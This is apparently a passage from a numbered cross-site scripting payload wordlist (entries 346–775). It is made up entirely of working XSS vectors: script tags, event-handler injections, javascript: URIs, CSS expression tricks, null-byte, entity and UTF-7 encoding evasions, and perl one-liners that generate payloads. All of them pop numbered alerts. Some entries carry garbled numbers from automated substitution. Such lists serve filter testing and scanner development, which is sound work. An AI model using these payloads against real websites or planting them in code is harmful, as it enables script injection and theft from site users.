  346. <script\x0D>javascript:alert(272)</script>
  347. <script\x0A>javascript:alert(273)</script>
  348. <script\x0C>javascript:alert(274)</script>
  349. <script\x00>javascript:alert(275)</script>
  350. <script\x09>javascript:alert(276)</script>
  351. `"'><img src=xxx:x onerror\x0B=javascript:alert(277)>
  352. `"'><img src=xxx:x onerror\x00=javascript:alert(278)>
  353. `"'><img src=xxx:x onerror\x0C=javascript:alert(279)>
  354. `"'><img src=xxx:x onerror\x0D=javascript:alert(280)>
  355. `"'><img src=xxx:x onerror\x20=javascript:alert(281)>
  356. `"'><img src=xxx:x onerror\x0A=javascript:alert(282)>
  357. `"'><img src=xxx:x onerror\x09=javascript:alert(283)>
  358. <script>javascript:alert(284)<\x00/script>
  359. <img src=# onerror\x3D"javascript:alert(285)" >
  360. <input onfocus=javascript:alert(286) autofocus>
  361. <input onblur=javascript:alert(287) autofocus><input autofocus>
  362. <video poster=javascript:javascript:alert(288)//
  363. <body onscroll=javascript:alert(289)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  364. <form id=test onforminput=javascript:alert(290)><input></form><button form=test onformchange=javascript:alert(290)>X
  365. <video><source onerror="javascript:javascript:alert(291)">
  366. <video onerror="javascript:javascript:alert(292)"><source>
  367. <form><button formaction="javascript:javascript:alert(293)">X
  368. <body oninput=javascript:alert(294)><input autofocus>
  369. <math href="javascript:javascript:alert(295)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(295)">CLICKME</maction> </math>
  370. <frameset onload=javascript:alert(296)>
  371. <table background="javascript:javascript:alert(297)">
  372. <!--<img src="--><img src=x onerror=javascript:alert(298)//">
  373. <comment><img src="</comment><img src=x onerror=javascript:alert(299))//">
  374. <![><img src="]><img src=x onerror=javascript:alert(300)//">
  375. <style><img src="</style><img src=x onerror=javascript:alert(301)//">
  376. <li style=list-style:url() onerror=javascript:alert(302)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(302)></div>
  377. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(303)//#">XXX</a></body>
  378. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(304)</SCRIPT>
  379. <OBJECT CLASSID="clsid:333C7BC4-460F-305305D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(305)"></OBJECT>
  380. <b <script>alert(308)</script>0
  381. <div id="div309"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div309").innerHTML;</script>
  382. <x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'>
  383. <embed src="javascript:alert(311)">
  384. <img src="javascript:alert(312)">
  385. <image src="javascript:alert(313)">
  386. <script src="javascript:alert(314)">
  387. <div style=width:315px;filter:glow onfilterchange=javascript:alert(315)>x
  388. <? foo="><script>javascript:alert(316)</script>">
  389. <! foo="><script>javascript:alert(317)</script>">
  390. </ foo="><script>javascript:alert(318)</script>">
  391. <? foo="><x foo='?><script>javascript:alert(319)</script>'>">
  392. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>">
  393. <% foo><x foo="%><script>javascript:alert(321)</script>">
  394. <div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script>
  395. <img \x00src=x onerror="alert(323)">
  396. <img \x47src=x onerror="javascript:alert(324)">
  397. <img \x325325src=x onerror="javascript:alert(325)">
  398. <img \x3262src=x onerror="javascript:alert(326)">
  399. <img\x47src=x onerror="javascript:alert(327)">
  400. <img\x3280src=x onerror="javascript:alert(328)">
  401. <img\x3293src=x onerror="javascript:alert(329)">
  402. <img\x32src=x onerror="javascript:alert(330)">
  403. <img\x47src=x onerror="javascript:alert(331)">
  404. <img\x332332src=x onerror="javascript:alert(332)">
  405. <img \x47src=x onerror="javascript:alert(333)">
  406. <img \x34src=x onerror="javascript:alert(334)">
  407. <img \x39src=x onerror="javascript:alert(335)">
  408. <img \x00src=x onerror="javascript:alert(336)">
  409. <img src\x09=x onerror="javascript:alert(337)">
  410. <img src\x3380=x onerror="javascript:alert(338)">
  411. <img src\x3393=x onerror="javascript:alert(339)">
  412. <img src\x32=x onerror="javascript:alert(340)">
  413. <img src\x3412=x onerror="javascript:alert(341)">
  414. <img src\x342342=x onerror="javascript:alert(342)">
  415. <img src\x00=x onerror="javascript:alert(343)">
  416. <img src\x47=x onerror="javascript:alert(344)">
  417. <img src=x\x09onerror="javascript:alert(345)">
  418. <img src=x\x3460onerror="javascript:alert(346)">
  419. <img src=x\x347347onerror="javascript:alert(347)">
  420. <img src=x\x3482onerror="javascript:alert(348)">
  421. <img src=x\x3493onerror="javascript:alert(349)">
  422. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)">
  423. <img src=x onerror=\x09"javascript:alert(351)">
  424. <img src=x onerror=\x3520"javascript:alert(352)">
  425. <img src=x onerror=\x353353"javascript:alert(353)">
  426. <img src=x onerror=\x3542"javascript:alert(354)">
  427. <img src=x onerror=\x32"javascript:alert(355)">
  428. <img src=x onerror=\x00"javascript:alert(356)">
  429. <a href=java&#357&#2&#3&#4&#5&#6&#7&#8&#357357&#3572script:javascript:alert(357)>XXX</a>
  430. <img src="x` `<script>javascript:alert(358)</script>"` `>
  431. <img src onerror /" '"= alt=javascript:alert(359)//">
  432. <title onpropertychange=javascript:alert(360)></title><title title=>
  433. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>">
  434. <!--[if]><script>javascript:alert(362)</script -->
  435. <!--[if<img src=x onerror=javascript:alert(363)//]> -->
  436. <object id="x" classid="clsid:CB927D3662-4FF7-4a9e-A36669-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C3667-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(366)" style="behavior:url(#x);"><param name=postdomevents /></object>
  437. <a style="-o-link:'javascript:javascript:alert(367)';-o-link-source:current">X
  438. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
  439. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(369))%7d
  440. <style>@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
  441. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(371);">XXX</a></a><a href="javascript:javascript:alert(371)">XXX</a>
  442. <// style=x:expression\28javascript:alert(375)\29>
  443. <style>*{x:expression(javascript:alert(376))}</style>
  444. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(378));">X
  445. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script>
  446. <script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script>
  447. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script>
  448. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script>
  449. <meta charset="mac-farsi">¼script¾javascript:alert(390)¼/script¾
  450. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(391)` >
  451. 392<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x4392vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(392)>`>
  452. 393<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(393)>>
  453. 395<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(395) strokecolor=white strokeweight=395000px from=0 to=395000 /></a>
  454. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(396)">XXX</a>
  455. <event-source src="%(event)s" onload="javascript:alert(399)">
  456. <a href="javascript:javascript:alert(400)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  457. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img񡿹src=x:x񡿹onerror񡿹=javascript:alert(401)>">
  458. <script>javascript:alert(405)</script>
  459. <IMG SRC="javascript:javascript:alert(406);">
  460. <IMG SRC=javascript:javascript:alert(407)>
  461. <IMG SRC=`javascript:javascript:alert(408)`>
  462. <FRAMESET><FRAME SRC="javascript:javascript:alert(410);"></FRAMESET>
  463. <BODY ONLOAD=javascript:alert(411)>
  464. <BODY ONLOAD=javascript:javascript:alert(412)>
  465. <IMG SRC="jav    ascript:javascript:alert(413);">
  466. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(414)>
  467. <IMG SRC="javascript:javascript:alert(417)"
  468. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(419);">
  469. <IMG DYNSRC="javascript:javascript:alert(420)">
  470. <IMG LOWSRC="javascript:javascript:alert(421)">
  471. <BGSOUND SRC="javascript:javascript:alert(422);">
  472. <BR SIZE="&{javascript:alert(423)}">
  473. <LINK REL="stylesheet" HREF="javascript:javascript:alert(425);">
  474. <STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE><UL><LI>XSS
  475. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(430);">
  476. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(431);">
  477. <IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>
  478. <TABLE BACKGROUND="javascript:javascript:alert(433)">
  479. <TABLE><TD BACKGROUND="javascript:javascript:alert(434)">
  480. <DIV STYLE="background-image: url(javascript:javascript:alert(435))">
  481. <DIV STYLE="width:expression(javascript:alert(436));">
  482. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(437))">
  483. <XSS STYLE="xss:expression(javascript:alert(438))">
  484. <STYLE TYPE="text/javascript">javascript:alert(439);</STYLE>
  485. <STYLE>.XSS{background-image:url("javascript:javascript:alert(440)");}</STYLE><A CLASS=XSS></A>
  486. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(441)")}</STYLE>
  487. <!--[if gte IE 4]><SCRIPT>javascript:alert(442);</SCRIPT><![endif]-->
  488. <BASE HREF="javascript:javascript:alert(443);//">
  489. <OBJECT classid=clsid:ae24fdae-03c6-445445d445-8b76-0080c744f389><param name=url value=javascript:javascript:alert(445)></OBJECT>
  490. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(446)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  491. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(447)</SCRIPT>"></BODY></HTML>
  492. <form id="test" /><button form="test" formaction="javascript:javascript:alert(450)">X
  493. <body onscroll=javascript:alert(451)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  494. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(452)">
  495. <STYLE>a{background:url('s454' 's2)}@import javascript:javascript:alert(454);');}</STYLE>
  496. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(455)&&;&&<&&/script&&>
  497. <SCRIPT onreadystatechange=javascript:javascript:alert(456);></SCRIPT>
  498. <style onreadystatechange=javascript:javascript:alert(457);></style>
  499. <?xml version="458.0"?><html:html xmlns:html='http://www.w3.org/458999/xhtml'><html:script>javascript:alert(458);</html:script></html:html>
  500. <embed code=javascript:javascript:alert(460);></embed>
  501. <frameset onload=javascript:javascript:alert(462)></frameset>
  502. <object onerror=javascript:javascript:alert(463)>
  503. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(465);">]]</C><X></xml>
  504. <IMG SRC=&{javascript:alert(466);};>
  505. <a href="jav&#65ascript:javascript:alert(467)">test467</a>
  506. <a href="jav&#97ascript:javascript:alert(468)">test468</a>
  507. <iframe srcdoc="&LT;iframe&sol;srcdoc=<img&sol;src=&apos;&apos;onerror=javascript:alert(470)>>">
  508. ';alert(471))//';alert(471))//";
  509. alert(472))//";alert(472))//--
  510. ></SCRIPT>">'><SCRIPT>alert(473))</SCRIPT>
  511. <IMG SRC="javascript:alert(476);">
  512. <IMG SRC=javascript:alert(477)>
  513. <IMG SRC=JaVaScRiPt:alert(478)>
  514. <IMG SRC=javascript:alert(479)>
  515. <IMG SRC=`javascript:alert(480)`>
  516. <a onmouseover="alert(481)">xxs link</a>
  517. <a onmouseover=alert(482)>xxs link</a>
  518. <IMG """><SCRIPT>alert(483)</SCRIPT>">
  519. <IMG SRC=javascript:alert(484))>
  520. <IMG SRC=# onmouseover="alert(485)">
  521. <IMG SRC= onmouseover="alert(486)">
  522. <IMG onmouseover="alert(487)">
  523. <IMG SRC="jav        ascript:alert(491);">
  524. <IMG SRC="jav        ascript:alert(492);">
  525. <IMG SRC="jav
  526. ascript:alert(493);">
  527. <IMG SRC="jav
    ascript:alert(494);">
  528. perl -e 'print "<IMG SRC=java\0script:alert(495)>";' > out
  529. <IMG SRC=" &#14;  javascript:alert(496);">
  530. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(498)>
  531. <<SCRIPT>alert(500);//<</SCRIPT>
  532. <IMG SRC="javascript:alert(503)"
  533. \";alert(505);//
  534. </TITLE><SCRIPT>alert(506);</SCRIPT>
  535. <INPUT TYPE="IMAGE" SRC="javascript:alert(507);">
  536. <BODY BACKGROUND="javascript:alert(508)">
  537. <IMG DYNSRC="javascript:alert(509)">
  538. <IMG LOWSRC="javascript:alert(510)">
  539. <STYLE>li {list-style-image: url("javascript:alert(511)");}</STYLE><UL><LI>XSS</br>
  540. <BODY ONLOAD=alert(514)>
  541. <BGSOUND SRC="javascript:alert(515);">
  542. <BR SIZE="&{alert(516)}">
  543. <LINK REL="stylesheet" HREF="javascript:alert(517);">
  544. <STYLE>@im\port'\ja\vasc\ript:alert(522)';</STYLE>
  545. <IMG STYLE="xss:expr/*XSS*/ession(alert(523))">
  546. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(524))'>
  547. <STYLE TYPE="text/javascript">alert(525);</STYLE>
  548. <STYLE>.XSS{background-image:url("javascript:alert(526)");}</STYLE><A CLASS=XSS></A>
  549. <STYLE type="text/css">BODY{background:url("javascript:alert(527)")}</STYLE>
  550. <STYLE type="text/css">BODY{background:url("javascript:alert(528)")}</STYLE>
  551. <XSS STYLE="xss:expression(alert(529))">
  552. ¼script¾alert(531)¼/script¾
  553. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(532);">
  554. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(534);">
  555. <IFRAME SRC="javascript:alert(535);"></IFRAME>
  556. <IFRAME SRC=# onmouseover="alert(536)"></IFRAME>
  557. <FRAMESET><FRAME SRC="javascript:alert(537);"></FRAMESET>
  558. <TABLE BACKGROUND="javascript:alert(538)">
  559. <TABLE><TD BACKGROUND="javascript:alert(539)">
  560. <DIV STYLE="background-image: url(javascript:alert(540))">
  561. <DIV STYLE="background-image: url(&#1;javascript:alert(542))">
  562. <DIV STYLE="width: expression(alert(543));">
  563. <BASE HREF="javascript:alert(544);//">
  564. <? echo('<SCR)';echo('IPT>alert(549)</SCRIPT>'); ?>
  565. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(552)</SCRIPT>">
  566. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(553);+ADw-/SCRIPT+AD4-
  567. <img src=`%00`&NewLine; onerror=alert(573)&NewLine;
  568. <script /*%00*/>/*%00*/alert(577)/*%00*/</script /*%00*/
  569. <iframe/src="data:text/html,<svg &#579579579;&#5795790;load=alert(579)>">
  570. <meta content="&NewLine; 580 &NewLine;; JAVASCRIPT&colon; alert(580)" http-equiv="refresh"/>
  571. <form><iframe         ᛸ򏬬 src="javascript:alert(588)"򏬬ᛸ        ;>
  572. http://www.google<script .com>alert(590)</script
  573. <script ^__^>alert(594))</script ^__^
  574. </style  ><script   :-(>/**/alert(595)/**/</script   :-(
  575. &#00;</form><input typeᧄ"date" onfocus="alert(596)">
  576. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(600)&NewLine;>X</a>
  577. <script ~~~>alert(601)</script ~~~>
  578. <iframe/%00/ src=javaSCRIPT&colon;alert(609)
  579. <%<!--'%><script>alert(626);</script -->
  580. <script src="data:text/javascript,alert(627)"></script>
  581. <iframe/onreadystatechange=alert(629)
  582. <svg/onload=alert(630)
  583. <input type="text" value=`` <div/onmouseover='alert(632)'>X</div>
  584. http://www.<script>alert(633)</script .com
  585. <svg><script ?>alert(635)
  586. <img src=`xx:xx`onerror=alert(637)>
  587. <meta http-equiv="refresh" content="0;javascript&colon;alert(639)"/>
  588. <script>+-+-649-+-+alert(649)</script>
  589. <body/onload=<!-->&#6500alert(650)>
  590. <script itworksinallbrowsers>/*<script* */alert(651)</script
  591. <img src ?itworksonchrome?\/onerror = alert(652)
  592. <svg><script onlypossibleinopera:-)> alert(654)
  593. <script x> alert(656) </script 656=2
  594. <div/onmouseover='alert(657)'> style="x:">
  595. <--`<img/src=` onerror=alert(658)> --!>
  596. <div style="position:absolute;top:0;left:0;width:66000%;height:66000%" onmouseover="prompt(660)" onclick="alert(660)">x</button>
  597. <form><button formaction=javascript&colon;alert(662)>CLICKME
  598. ‘; alert(667);
  599. ‘)alert(668);//
  600. <ScRiPt>alert(669)</sCriPt>
  601. <IMG SRC=jAVasCrIPt:alert(670)>
  602. <IMG SRC=”javascript:alert(671);”>
  603. <IMG SRC=javascript:alert(672)>
  604. <IMG SRC=javascript:alert(673)>
  605. <img src=xss onerror=alert(674)>
  606. <img src=`%00`&NewLine; onerror=alert(681)&NewLine;
  607. <script /*%00*/>/*%00*/alert(685)/*%00*/</script /*%00*/
  608. <iframe/src="data:text/html,<svg &#687687687;&#6876870;load=alert(687)>">
  609. <meta content="&NewLine; 688 &NewLine;; JAVASCRIPT&colon; alert(688)" http-equiv="refresh"/>
  610. <form><iframe         ᬰ򪅸 src="javascript:alert(696)"򪅸ᬰ        ;>
  611. http://www.google<script .com>alert(698)</script
  612. <script ^__^>alert(702))</script ^__^
  613. </style  ><script   :-(>/**/alert(703)/**/</script   :-(
  614. &#00;</form><input typeᨰ"date" onfocus="alert(704)">
  615. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(708)&NewLine;>X</a>
  616. <script ~~~>alert(709)</script ~~~>
  617. <iframe/%00/ src=javaSCRIPT&colon;alert(717)
  618. <%<!--'%><script>alert(734);</script -->
  619. <script src="data:text/javascript,alert(735)"></script>
  620. <iframe/onreadystatechange=alert(737)
  621. <svg/onload=alert(738)
  622. <input type="text" value=`` <div/onmouseover='alert(740)'>X</div>
  623. http://www.<script>alert(741)</script .com
  624. <svg><script ?>alert(743)
  625. <img src=`xx:xx`onerror=alert(745)>
  626. <meta http-equiv="refresh" content="0;javascript&colon;alert(746)"/>
  627. <script>+-+-756-+-+alert(756)</script>
  628. <body/onload=<!-->&#7570alert(757)>
  629. <script itworksinallbrowsers>/*<script* */alert(758)</script
  630. <img src ?itworksonchrome?\/onerror = alert(759)
  631. <svg><script onlypossibleinopera:-)> alert(761)
  632. <script x> alert(763) </script 763=2
  633. <div/onmouseover='alert(764)'> style="x:">
  634. <--`<img/src=` onerror=alert(765)> --!>
  635. <div style="xg-p:absolute;top:0;left:0;width:76700%;height:76700%" onmouseover="prompt(767)" onclick="alert(767)">x</button>
  636. <form><button formaction=javascript&colon;alert(769)>CLICKME
  637. ‘;alert(775))//’;alert(775))//”;alert(775))//”;alert(775))//–></SCRIPT>”>’><SCRIPT>alert(775))</SCRIPT>
  638. <IMG “””><SCRIPT>alert(776)</SCRIPT>”>
  639. <IMG SRC=javascript:alert(777))>
  640. <IMG SRC=”jav ascript:alert(778);”>
  641. <IMG SRC=”jav        ascript:alert(779);”>
  642. <<SCRIPT>alert(780);//<</SCRIPT>
  643. %253cscript%253ealert(781)%253c/script%253e
  644. “><s”%2b”cript>alert(782)</script>
  645. foo<script>alert(783)</script>
  646. <scr<script>ipt>alert(784)</scr</script>ipt>
  647. <BODY BACKGROUND=”javascript:alert(788)”>
  648. <BODY ONLOAD=alert(789)>
  649. <INPUT TYPE=”IMAGE” SRC=”javascript:alert(790);”>
  650. <IMG SRC=”javascript:alert(791)”
  651. javascript:alert(793)
  652. <img src="javascript:alert(794);">
  653. <img src=javascript:alert(795)>
  654. <"';alert(796))//\';alert(796))//";alert(796))//\";alert(796))//--></SCRIPT>">'><SCRIPT>alert(796))</SCRIPT>
  655. <IFRAME SRC="javascript:alert(798);"></IFRAME>
  656. <<SCRIPT>alert(805);//<</SCRIPT>
  657. <"';alert(806))//\';alert(806))//";alert(806))//\";alert(806))//--></SCRIPT>">'><SCRIPT>alert(806))</SCRIPT>
  658. ';alert(807))//\';alert(807))//";alert(807))//\";alert(807))//--></SCRIPT>">'><SCRIPT>alert(807))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
  659. <script>alert(808)</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
  660. <script>alert(809);</script>&search=1
  661. 0&q=';alert(810))//\';alert%2?8810))//";alert(String.fromCharCode?(88,83,83))//\";alert(810)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
  662. <BODY ONLOAD=alert(812)>
  663. <body onscroll=alert(815)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  664. <form><button formaction="javascript:alert(816)">lol
  665. <!--<img src="--><img src=x onerror=alert(817)//">
  666. <![><img src="]><img src=x onerror=alert(818)//">
  667. <style><img src="</style><img src=x onerror=alert(819)//">
  668. <? foo="><script>alert(820)</script>">
  669. <! foo="><script>alert(821)</script>">
  670. </ foo="><script>alert(822)</script>">
  671. <? foo="><x foo='?><script>alert(823)</script>'>">
  672. <! foo="[[[Inception]]"><x foo="]foo><script>alert(824)</script>">
  673. <% foo><x foo="%><script>alert(825)</script>">
  674. <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(829)</script></svg>
  675. <SCRIPT>alert(830)</SCRIPT>
  676. \\";alert(831);//
  677. </TITLE><SCRIPT>alert(832);</SCRIPT>
  678. <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert(833);\">
  679. <BODY BACKGROUND=\"javascript:alert(834)\">
  680. <BODY ONLOAD=alert(835)>
  681. <IMG DYNSRC=\"javascript:alert(836)\">
  682. <IMG LOWSRC=\"javascript:alert(837)\">
  683. <BGSOUND SRC=\"javascript:alert(838);\">
  684. <BR SIZE=\"&{alert(839)}\">
  685. <LINK REL=\"stylesheet\" HREF=\"javascript:alert(841);\">
  686. <STYLE>li {list-style-image: url(\"javascript:alert(847)\");}</STYLE><UL><LI>XSS
  687. žscriptualert(851)ž/scriptu
  688. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(852);\">
  689. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(854);\"
  690. <IFRAME SRC=\"javascript:alert(855);\"></IFRAME>
  691. <FRAMESET><FRAME SRC=\"javascript:alert(856);\"></FRAMESET>
  692. <TABLE BACKGROUND=\"javascript:alert(857)\">
  693. <TABLE><TD BACKGROUND=\"javascript:alert(858)\">
  694. <DIV STYLE=\"background-image: url(javascript:alert(859))\">
  695. <DIV STYLE=\"background-image: url(javascript:alert(861))\">
  696. <DIV STYLE=\"width: expression(alert(862));\">
  697. <STYLE>@im\port'\ja\vasc\ript:alert(863)';</STYLE>
  698. <IMG STYLE=\"xss:expr/*XSS*/ession(alert(864))\">
  699. <XSS STYLE=\"xss:expression(alert(865))\">
  700. xss:ex/*XSS*//*/*/pression(alert(867))'>
  701. <STYLE TYPE=\"text/javascript\">alert(868);</STYLE>
  702. <STYLE>.XSS{background-image:url(\"javascript:alert(869)\");}</STYLE><A CLASS=XSS></A>
  703. <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert(870)\")}</STYLE>
  704. <SCRIPT>alert(872);</SCRIPT>
  705. <BASE HREF=\"javascript:alert(874);//\">
  706. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(876)></OBJECT>
  707. d=\"alert(882);\\")\";
  708. <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(885);\">]]>
  709. <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert(887)\"></B></I></XML>
  710. <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert(894)</SCRIPT>\">
  711. echo('IPT>alert(899)</SCRIPT>'); ?>
  712. <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert(902)</SCRIPT>\">
  713. <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert(903);+ADw-/SCRIPT+AD4-
  714. <IMG SRC=\"javascript:alert(991)\"
  715. <<SCRIPT>alert(994);//<</SCRIPT>
  716. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(996)>
  717. <IMG SRC=\"   javascript:alert(998);\">
  718. perl -e 'print \"<SCR\0IPT>alert(999)</SCR\0IPT>\";' > out
  719. perl -e 'print \"<IMG SRC=java\0script:alert(1000)>\";' > out
  720. <IMG SRC=\"jav
    ascript:alert(1001);\">
  721. <IMG SRC=\"jav
  722. ascript:alert(1002);\">
  723. <IMG SRC=\"jav        ascript:alert(1003);\">
  724. <IMG SRC=javascript:alert(1006)>
  725. <IMG SRC=javascript:alert(1007))>
  726. <IMG \"\"\"><SCRIPT>alert(1008)</SCRIPT>\">
  727. <IMG SRC=`javascript:alert(1009)`>
  728. <IMG SRC=javascript:alert(1010)>
  729. <IMG SRC=JaVaScRiPt:alert(1011)>
  730. <IMG SRC=javascript:alert(1012)>
  731. <IMG SRC=\"javascript:alert(1013);\">
  732. ';alert(1016))//\';alert(1016))//\";alert(1016))//\\";alert(1016))//--></SCRIPT>\">'><SCRIPT>alert(1016))</SCRIPT>
  733. ';alert(1017))//\';alert(1017))//";alert(1017))//\";alert(1017))//--></SCRIPT>">'><SCRIPT>alert(1017))</SCRIPT>
  734. <IMG SRC="javascript:alert(1020);">
  735. <IMG SRC=javascript:alert(1021)>
  736. <IMG SRC=javascrscriptipt:alert(1022)>
  737. <IMG SRC=JaVaScRiPt:alert(1023)>
  738. <IMG """><SCRIPT>alert(1024)</SCRIPT>">
  739. <IMG SRC=" &#14;  javascript:alert(1025);">
  740. <<SCRIPT>alert(1028);//<</SCRIPT>
  741. <SCRIPT>a=/XSS/alert(1029)</SCRIPT>
  742. \";alert(1030);//
  743. </TITLE><SCRIPT>alert(1031);</SCRIPT>
  744. ¼script¾alert(1032)¼/script¾
  745. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1033);">
  746. <IFRAME SRC="javascript:alert(1034);"></IFRAME>
  747. <FRAMESET><FRAME SRC="javascript:alert(1035);"></FRAMESET>
  748. <TABLE BACKGROUND="javascript:alert(1036)">
  749. <TABLE><TD BACKGROUND="javascript:alert(1037)">
  750. <DIV STYLE="background-image: url(javascript:alert(1038))">
  751. <DIV STYLE="width: expression(alert(1040));">
  752. <STYLE>@im\port'\ja\vasc\ript:alert(1041)';</STYLE>
  753. <IMG STYLE="xss:expr/*XSS*/ession(alert(1042))">
  754. <XSS STYLE="xss:expression(alert(1043))">
  755. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1044))'>
  756. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert(1048)</SCRIPT>"></BODY></HTML>
  757. <form id="test" /><button form="test" formaction="javascript:alert(1050)">TESTHTML5FORMACTION
  758. <form><button formaction="javascript:alert(1051)">crosssitespt
  759. <frameset onload=alert(1052)>
  760. <!--<img src="--><img src=x onerror=alert(1053)//">
  761. <style><img src="</style><img src=x onerror=alert(1054)//">
  762. <embed src="javascript:alert(1057)">
  763. <? foo="><script>alert(1058)</script>">
  764. <! foo="><script>alert(1059)</script>">
  765. </ foo="><script>alert(1060)</script>">
  766. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1062)}),x</script>
  767. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1063)')()</script>
  768. <script src="#">{alert(1064)}</script>;1064
  769. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1065)',384,null,'rsa-dual-use')</script>
  770. <svg xmlns="#"><script>alert(1066)</script></svg>
  771. <svg onload="javascript:alert(1067)" xmlns="#"></svg>
  772. <iframe xmlns="#" src="javascript:alert(1068)"></iframe>
  773. +ADw-script+AD4-alert(1069)+ADw-/script+AD4-
  774. %2BADw-script+AD4-alert(1070)%2BADw-/script%2BAD4-
  775. +ACIAPgA8-script+AD4-alert(1071)+ADw-/script+AD4APAAi-
